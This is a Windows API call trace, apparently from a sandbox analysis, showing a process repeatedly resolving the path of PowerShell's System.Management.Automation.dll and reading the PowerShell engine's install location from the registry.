	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetCurrentProcessId () returned 0x888
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.179] GetLastError () returned 0xcb
	[0171.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.179] GetLastError () returned 0xcb
	[0171.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.179] GetLastError () returned 0xcb
	[0171.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.179] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.180] GetLastError () returned 0xcb
	[0171.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e55c | out: phkResult=0x14e55c*=0x388) returned 0x0
	[0171.181] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e5a4, lpData=0x0, lpcbData=0x14e5a0*=0x0 | out: lpType=0x14e5a4*=0x1, lpData=0x0, lpcbData=0x14e5a0*=0x56) returned 0x0
	[0171.181] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e5a4, lpData=0x721bd8, lpcbData=0x14e5a0*=0x56 | out: lpType=0x14e5a4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e5a0*=0x56) returned 0x0
	[0171.181] RegCloseKey (hKey=0x388) returned 0x0
	[0171.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.182] GetLastError () returned 0xcb
	[0171.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.182] GetLastError () returned 0xcb
	[0171.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.182] GetLastError () returned 0xcb
	[0171.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.182] GetLastError () returned 0xcb
	[0171.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.182] GetLastError () returned 0xcb
	[0171.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.183] GetLastError () returned 0xcb
	[0171.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.215] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.216] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.217] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.218] GetLastError () returned 0xcb
	[0171.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.219] GetLastError () returned 0xcb
	[0171.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
